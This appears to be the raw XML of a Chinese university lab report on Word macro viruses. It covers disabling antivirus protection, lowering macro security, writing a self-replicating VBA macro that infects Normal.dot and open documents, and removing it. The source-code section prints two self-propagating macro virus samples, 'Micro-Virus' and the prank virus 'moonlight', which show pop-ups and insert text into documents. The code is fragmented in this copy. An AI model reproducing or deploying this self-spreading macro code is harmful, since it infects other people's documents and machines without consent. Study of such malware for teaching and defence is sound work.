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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>宏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>病毒实验报告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asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"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bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>组员名单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Theme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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1.【实验目的】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（1）演示宏的编写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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（2）说明宏的原理以及安全漏洞和缺陷</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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  （3）理解宏病毒的作用机制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2.【实验内容】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default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运行自我复制，感染Word公用模板和当前文档；具有一定破坏性的宏；清除宏病毒。</w:t>
      </w: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3.【实验环境】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="420" w:firstLineChars="20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VMWare 16.2.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"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Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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4.【实验素材】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine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macro_1.vb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine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macro_2.vb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine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office2003</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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5.【实验步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>】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(1)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关闭杀毒软件的自我防护功能。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打开Word 2003,在“工具”→“宏”一“安全性”中,将安全级别设置为低,在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板,选择信任visualbasic项目的访问。(图 5-1，图5-2)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5276850" cy="3792220"/>
            <wp:effectExtent l="0" t="0" r="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</w:rPr>
        <w:t>图 5-1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5274945" cy="42640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 xml:space="preserve">   </w:t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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图5-2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(2)自我复制功能演示。打开一一个Word文档，然后按Alt+F11组合键调用宏编写窗 口(“工具”→“宏”→Visual Basic→“宏编辑器”)，在左侧的Project- →“Microsoft Word对象”→ThisDocument中输人源代码(参见源代码一或者从下载文件中复制，位置为macro1.txt，保存。）（图5-3）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5273040" cy="53638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图5-3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（3）此时当前Word文档就含有宏病毒,只要下次打开这个Word文档，就会执行以上代码,并将自身复制到Normal. dot(Word文档的公共模板)和当前文档的ThisDocument中，同时改变函数名(模板中为Document._Close,当前文档为DocumentOpen)。此时所有的Word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响Word的正常使用，本例中只是简单地弹出一个提示框。（图5-4）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5275580" cy="39185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图5-4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清除宏病毒。对每一个受感染的Word文档进行如下操作。打开受感染的Word文档，进人宏编辑环境(Alt+ F11)，打开Normal→MicrosoftWord对象→ThisDocument,清除其中的病毒代码(只要删除所有内容即可)。然后打开Project→Microsoft Word→This Document ,清除其中的病毒代码。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现在开始清除圈出来的源代码。（图5-5）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5276215" cy="3943985"/>
            <wp:effectExtent l="0" t="0" r="63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图5-5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【实验原理】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由自动宏和(或）标准宏构成的宏病毒，其内部都具有把带病毒的宏移植（复制）到通用宏的代码段，也就是说宏病毒通过这种方式实现对其他文件的传染。如果某个DOC文件感染了这类Word 宏病毒，则当Word 执行这类自动宏时，实际上就是运行了病毒代码。当Word系统退出时，它会自动地把所有通用宏（当然也包括传染进来的宏病毒）保存到模板文件中。当 Word系统再次启动时，它又会自动地把所有通用宏(包括宏病毒）从模板中装人。如此，一旦 Word系统遭受感染，则每当系统进行初始化时，都会随着模板文件的装人而成为带病毒的Word系统，继而在打开和创建任何文档时都会感染该文档。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一旦宏病毒侵入 Word 系统，它就会替代原有的正常宏（如 FileOpen、FileSave、FileSaveAs和 FilePrint 等)并通过它们所关联的文件操作功能获取对文件交换的控制。当某项功能被调用时，相应的宏病毒就会篡夺控制权，实施病毒所定义的非法操作(包括传染操作及破坏操作等）。宏病毒在感染一个文档时，首先要把文档转换成模板格式，然后把所有宏病毒(包括自动宏）复制到该文档中。被转换成模板格式后的染毒文件无法转存为任何其他格式。含有自动宏的宏病毒染毒文档当被其他计算机的Word系统打开时，便会自动感染该计算机.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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几乎所有已知的宏病毒都沿用了相同的作用机制。Word宏病毒几乎是唯一可跨越不同硬件平台而生存、传染和流行的一类病毒。如果说宏病毒还有什么局限性的话，那就是这些病毒必须依赖某个可受其感染的系统(如 Word、Excel)。没有这些特定的系统，这些宏病毒便成了无水之鱼。由于Word允许对宏身进行加密操作,因此有许多宏病毒是经过加密处理的，不经过特殊处理是无法进行编辑或观察的，这也是很多宏病毒无法手工杀除的主要原因。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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【源码分析】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>示例1：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（自我复制）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'Micro-Virus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Document_Open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 Error Resume Next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'如果显示状态栏，则其值为 True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DisplayStatusBar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False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Options.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SaveNormalPrompt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False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'使用此属性可以访问代码模块和用户窗体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Ourcode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ThisDocument.VBProject.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VBComponents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).CodeModule.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Set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NormalTemplate.VBProject.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VBComponents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).CodeModule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'判断是否是模板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ThisDocument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NormalTemplate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Set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ActiveDocument.VBProject.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VBComponents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).CodeModule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'With语句中，点访问符默认指向的就是With语句指定的对象。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Host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&lt;&gt;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"'Micro-Virus"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.DeleteLines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.CountOfLines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.InsertLines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Ourcode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.ReplaceLine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 Document_Close()"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ThisDocument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nomaltemplate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.ReplaceLine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 Document_Open()"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ActiveDocument.SaveAs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.FullName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"MicroVirus by Content Security Lab"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 Sub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:p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</w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs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'moonlight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Dim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nm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Sub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Document_Open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'DisableInput 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ourcodemodule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ThisDocument.VBProject.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VBComponents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).CodeModule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NormalTemplate.VBProject.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VBComponents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).CodeModule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ThisDocument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NormalTemplate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Set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ActiveDocument.VBProject.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VBComponents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).CodeModule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host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&lt;&gt;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"'moonlight"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.DeleteLines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, .CountOfLines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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' 删除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.InsertLines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, ourcodemodule.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'添加一行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.ReplaceLine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"Sub Document_Close()"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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'替换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ThisDocument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NormalTemplate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.ReplaceLine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"Sub Document_Open()"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ActiveDocument.SaveAs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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ActiveDocument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.FullName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Try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On Error GoTo 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try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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'报错就重试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con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tog$ =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nm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Rnd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*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con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con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nm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tog$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tog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 +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Str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nm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"=?"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GoTo beg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tog$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tog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 +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Str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nm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"*"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beg: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Beep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'弹出各种窗口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ans$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InputBox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"今天是"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Date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$ +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",跟你玩一个心算游戏"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Chr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"若你答错，只好接受震撼教育......"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Chr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+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tog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$,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"台湾NO.1 Macro Virus"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RTrim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LTrim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$))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LTrim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con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Documents.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Selection.Paragraphs.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Alignment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wdAlignParagraphCenter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Beep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Selection.Font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"细明体"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Underline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Selection.InsertAfter Text:=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"何谓宏病毒"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Selection.InsertParagraphAfter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Beep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Selection.InsertAfter Text:=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"答案："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Selection.Font.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Italic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Selection.InsertAfter Text:=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"我就是......"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Selection.InsertParagraphAfter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Selection.InsertParagraphAfter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Selection.Font.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Italic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Beep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Selection.InsertAfter Text:=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"如何预防宏病毒"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Selection.InsertParagraphAfter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Beep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Selection.InsertAfter Text:=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"答案："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Selection.Font.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Italic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Selection.InsertAfter Text:=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"不要看我......"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GoTo out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Count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Beep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Documents.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs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Selection.Paragraphs.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Alignment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wdAlignParagraphCenter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Selection.InsertAfter Text:=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="1E1E1E"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"宏病毒"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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs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GoTo out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GoTo try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Wend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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="1E1E1E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out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 w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="1E1E1E"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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nd Sub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312"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="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ab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.【实验总结】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/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FBB5E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9ECFBB5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BDB491"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFBDB491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3F76A85"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="73F76A8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4MjQ5Y2QzYTUwZGE5Njg1OTUyNzJjZTBjNTM5MWEifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="004E57C5"/>
    <w:rsid w:val="00033416"/>
    <w:rsid w:val="000A679D"/>
    <w:rsid w:val="00132CE9"/>
    <w:rsid w:val="00150FCF"/>
    <w:rsid w:val="0015299F"/>
    <w:rsid w:val="00153A24"/>
    <w:rsid w:val="001E68A9"/>
    <w:rsid w:val="001F316B"/>
    <w:rsid w:val="00234E78"/>
    <w:rsid w:val="0023521F"/>
    <w:rsid w:val="00252763"/>
    <w:rsid w:val="00283AC8"/>
    <w:rsid w:val="002918BE"/>
    <w:rsid w:val="002C70A5"/>
    <w:rsid w:val="00304F8E"/>
    <w:rsid w:val="003058AE"/>
    <w:rsid w:val="00350C7B"/>
    <w:rsid w:val="003C1AD8"/>
    <w:rsid w:val="00432948"/>
    <w:rsid w:val="004B6070"/>
    <w:rsid w:val="004C6665"/>
    <w:rsid w:val="004D07C5"/>
    <w:rsid w:val="004E57C5"/>
    <w:rsid w:val="005533E0"/>
    <w:rsid w:val="005A5051"/>
    <w:rsid w:val="005B01DE"/>
    <w:rsid w:val="0063778E"/>
    <w:rsid w:val="0065092D"/>
    <w:rsid w:val="00672FC7"/>
    <w:rsid w:val="00744952"/>
    <w:rsid w:val="007662B4"/>
    <w:rsid w:val="00904C2E"/>
    <w:rsid w:val="00985419"/>
    <w:rsid w:val="00A71DDD"/>
    <w:rsid w:val="00AD019D"/>
    <w:rsid w:val="00B36EA5"/>
    <w:rsid w:val="00B6397C"/>
    <w:rsid w:val="00B738A7"/>
    <w:rsid w:val="00BC683B"/>
    <w:rsid w:val="00BC7213"/>
    <w:rsid w:val="00BD2E15"/>
    <w:rsid w:val="00BE1ED2"/>
    <w:rsid w:val="00C54423"/>
    <w:rsid w:val="00CB488E"/>
    <w:rsid w:val="00D51531"/>
    <w:rsid w:val="00D719A0"/>
    <w:rsid w:val="00DD0877"/>
    <w:rsid w:val="00E337F6"/>
    <w:rsid w:val="00E96D7D"/>
    <w:rsid w:val="00EC1816"/>
    <w:rsid w:val="00ED28D0"/>
    <w:rsid w:val="00FD64C5"/>
    <w:rsid w:val="01551395"/>
    <w:rsid w:val="021F55F6"/>
    <w:rsid w:val="03552601"/>
    <w:rsid w:val="041B6CAE"/>
    <w:rsid w:val="04A56162"/>
    <w:rsid w:val="06DB3014"/>
    <w:rsid w:val="07AE2045"/>
    <w:rsid w:val="085D72E2"/>
    <w:rsid w:val="08F037B7"/>
    <w:rsid w:val="090C7F1D"/>
    <w:rsid w:val="091A2FFB"/>
    <w:rsid w:val="09845A93"/>
    <w:rsid w:val="099113E8"/>
    <w:rsid w:val="09D61AB4"/>
    <w:rsid w:val="0A2A38DB"/>
    <w:rsid w:val="0B410994"/>
    <w:rsid w:val="0C941C4E"/>
    <w:rsid w:val="0DBD0EE4"/>
    <w:rsid w:val="0F271115"/>
    <w:rsid w:val="0FC008D9"/>
    <w:rsid w:val="0FD83DE3"/>
    <w:rsid w:val="100F1E58"/>
    <w:rsid w:val="107370BC"/>
    <w:rsid w:val="10987607"/>
    <w:rsid w:val="10BF65FC"/>
    <w:rsid w:val="1198021F"/>
    <w:rsid w:val="122E7020"/>
    <w:rsid w:val="12B07A1B"/>
    <w:rsid w:val="12F36808"/>
    <w:rsid w:val="130B54A6"/>
    <w:rsid w:val="13BD1EA6"/>
    <w:rsid w:val="13FD1E30"/>
    <w:rsid w:val="153C327C"/>
    <w:rsid w:val="15BD24EF"/>
    <w:rsid w:val="161832C5"/>
    <w:rsid w:val="16B741E7"/>
    <w:rsid w:val="171072A6"/>
    <w:rsid w:val="17215F32"/>
    <w:rsid w:val="175D0774"/>
    <w:rsid w:val="19063561"/>
    <w:rsid w:val="1A9E5940"/>
    <w:rsid w:val="1B661C17"/>
    <w:rsid w:val="1BD379B0"/>
    <w:rsid w:val="1D777F85"/>
    <w:rsid w:val="1DFFFF1B"/>
    <w:rsid w:val="1E8D2512"/>
    <w:rsid w:val="1EF7515B"/>
    <w:rsid w:val="20DA1145"/>
    <w:rsid w:val="21651C20"/>
    <w:rsid w:val="21D535D4"/>
    <w:rsid w:val="23E06F78"/>
    <w:rsid w:val="23EDEEAB"/>
    <w:rsid w:val="25806408"/>
    <w:rsid w:val="25DB7C83"/>
    <w:rsid w:val="25E15EDC"/>
    <w:rsid w:val="25F860DB"/>
    <w:rsid w:val="267F67D1"/>
    <w:rsid w:val="272876DE"/>
    <w:rsid w:val="28D26B4A"/>
    <w:rsid w:val="2A0A25AC"/>
    <w:rsid w:val="2A816610"/>
    <w:rsid w:val="2B4E792D"/>
    <w:rsid w:val="2C324A53"/>
    <w:rsid w:val="2E626C07"/>
    <w:rsid w:val="2E6F0022"/>
    <w:rsid w:val="2F377368"/>
    <w:rsid w:val="300F612A"/>
    <w:rsid w:val="318A7403"/>
    <w:rsid w:val="31A33B7E"/>
    <w:rsid w:val="331A591A"/>
    <w:rsid w:val="33BB54EB"/>
    <w:rsid w:val="33C64281"/>
    <w:rsid w:val="35335CA7"/>
    <w:rsid w:val="35B46683"/>
    <w:rsid w:val="35E623C9"/>
    <w:rsid w:val="36484AF7"/>
    <w:rsid w:val="3793757A"/>
    <w:rsid w:val="37BA6CFC"/>
    <w:rsid w:val="3959307F"/>
    <w:rsid w:val="398C34AC"/>
    <w:rsid w:val="3AEC3E9A"/>
    <w:rsid w:val="3AF02D9F"/>
    <w:rsid w:val="3AF9AC30"/>
    <w:rsid w:val="3B247C1B"/>
    <w:rsid w:val="3BD36692"/>
    <w:rsid w:val="3D0D7987"/>
    <w:rsid w:val="3DEF8408"/>
    <w:rsid w:val="3DFF0BAA"/>
    <w:rsid w:val="3E9A1AB1"/>
    <w:rsid w:val="3ED36514"/>
    <w:rsid w:val="3FD95D0C"/>
    <w:rsid w:val="3FE01789"/>
    <w:rsid w:val="41082624"/>
    <w:rsid w:val="41833C3C"/>
    <w:rsid w:val="41CA0DF1"/>
    <w:rsid w:val="420258B9"/>
    <w:rsid w:val="42D8788A"/>
    <w:rsid w:val="42E0084A"/>
    <w:rsid w:val="43104057"/>
    <w:rsid w:val="455B28A1"/>
    <w:rsid w:val="45E63AEC"/>
    <w:rsid w:val="47770072"/>
    <w:rsid w:val="47BE672D"/>
    <w:rsid w:val="4A252EDA"/>
    <w:rsid w:val="4AD56FB2"/>
    <w:rsid w:val="4AD979C2"/>
    <w:rsid w:val="4B151F68"/>
    <w:rsid w:val="4C1437AE"/>
    <w:rsid w:val="4CAE4A6E"/>
    <w:rsid w:val="4CE84BC2"/>
    <w:rsid w:val="4D11602A"/>
    <w:rsid w:val="4DD23507"/>
    <w:rsid w:val="4E35579B"/>
    <w:rsid w:val="4EA75CC5"/>
    <w:rsid w:val="4FD94C8F"/>
    <w:rsid w:val="51962ECC"/>
    <w:rsid w:val="51AE54A6"/>
    <w:rsid w:val="51D306A3"/>
    <w:rsid w:val="51EA5730"/>
    <w:rsid w:val="522D7A83"/>
    <w:rsid w:val="5381393B"/>
    <w:rsid w:val="55373E5D"/>
    <w:rsid w:val="56BE2AC1"/>
    <w:rsid w:val="58587ABB"/>
    <w:rsid w:val="598A5B33"/>
    <w:rsid w:val="5A422B5E"/>
    <w:rsid w:val="5A470D1A"/>
    <w:rsid w:val="5A5042EC"/>
    <w:rsid w:val="5B71065C"/>
    <w:rsid w:val="5BBF1BE8"/>
    <w:rsid w:val="5CF31D30"/>
    <w:rsid w:val="5DB361BB"/>
    <w:rsid w:val="5DBDAA15"/>
    <w:rsid w:val="5E362E71"/>
    <w:rsid w:val="5F292C6A"/>
    <w:rsid w:val="5F9E2842"/>
    <w:rsid w:val="5FBD5FB3"/>
    <w:rsid w:val="5FDC6ECE"/>
    <w:rsid w:val="5FDECB4A"/>
    <w:rsid w:val="5FFED15C"/>
    <w:rsid w:val="601E3AF4"/>
    <w:rsid w:val="60A52CFD"/>
    <w:rsid w:val="6151629C"/>
    <w:rsid w:val="61E43D57"/>
    <w:rsid w:val="62732A66"/>
    <w:rsid w:val="62BC7AE6"/>
    <w:rsid w:val="62E033E0"/>
    <w:rsid w:val="655518D4"/>
    <w:rsid w:val="65BF46FE"/>
    <w:rsid w:val="6617CFC5"/>
    <w:rsid w:val="666C4F90"/>
    <w:rsid w:val="66960935"/>
    <w:rsid w:val="6824386B"/>
    <w:rsid w:val="68BE32F3"/>
    <w:rsid w:val="69EB425B"/>
    <w:rsid w:val="6A7362EA"/>
    <w:rsid w:val="6B114927"/>
    <w:rsid w:val="6BD75B3D"/>
    <w:rsid w:val="6E6B66ED"/>
    <w:rsid w:val="6E864723"/>
    <w:rsid w:val="6E9B21D6"/>
    <w:rsid w:val="6EFB08D6"/>
    <w:rsid w:val="6F2F08C9"/>
    <w:rsid w:val="6F6434F3"/>
    <w:rsid w:val="6FF36494"/>
    <w:rsid w:val="6FFFA0EA"/>
    <w:rsid w:val="713719A4"/>
    <w:rsid w:val="71706B38"/>
    <w:rsid w:val="72360F31"/>
    <w:rsid w:val="724E2520"/>
    <w:rsid w:val="730F4958"/>
    <w:rsid w:val="747673BA"/>
    <w:rsid w:val="750477C2"/>
    <w:rsid w:val="7594043D"/>
    <w:rsid w:val="76180194"/>
    <w:rsid w:val="76217B43"/>
    <w:rsid w:val="777B04F7"/>
    <w:rsid w:val="779416A9"/>
    <w:rsid w:val="77BBB770"/>
    <w:rsid w:val="782D6C39"/>
    <w:rsid w:val="785053AF"/>
    <w:rsid w:val="78DB6F47"/>
    <w:rsid w:val="79AE69F5"/>
    <w:rsid w:val="7A684068"/>
    <w:rsid w:val="7AFE6872"/>
    <w:rsid w:val="7B5FB06E"/>
    <w:rsid w:val="7B62421F"/>
    <w:rsid w:val="7BDEA893"/>
    <w:rsid w:val="7BFFD1EB"/>
    <w:rsid w:val="7C2C5CED"/>
    <w:rsid w:val="7EC733F0"/>
    <w:rsid w:val="7FCE3FF6"/>
    <w:rsid w:val="7FEF474D"/>
    <w:rsid w:val="A3FDD4DF"/>
    <w:rsid w:val="CF7E06B0"/>
    <w:rsid w:val="D75F2B2E"/>
    <w:rsid w:val="DB836352"/>
    <w:rsid w:val="DFF38231"/>
    <w:rsid w:val="EC3FF2D1"/>
    <w:rsid w:val="EF5FAFF0"/>
    <w:rsid w:val="EFFB4729"/>
    <w:rsid w:val="F31B3DC9"/>
    <w:rsid w:val="F3FE66D8"/>
    <w:rsid w:val="F5F1130D"/>
    <w:rsid w:val="F66F9EB2"/>
    <w:rsid w:val="F7BFF647"/>
    <w:rsid w:val="F7F9E651"/>
    <w:rsid w:val="FA74F7B6"/>
    <w:rsid w:val="FB7E4D2E"/>
    <w:rsid w:val="FB7EA813"/>
    <w:rsid w:val="FF3F4F0D"/>
    <w:rsid w:val="FF7FC725"/>
    <w:rsid w:val="FFBAF429"/>
    <w:rsid w:val="FF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批注框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眉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2261</Words>
  <Characters>4512</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6017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2019-09-21T13:50:00Z</dcterms:created>
  <dc:creator>Windows 用户</dc:creator>
  <cp:lastModifiedBy>辛弃疾</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-07T02:02:58Z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618148CA90E44020B66D2D2262413CFE</vt:lpwstr>
  </property>
</Properties>
</file>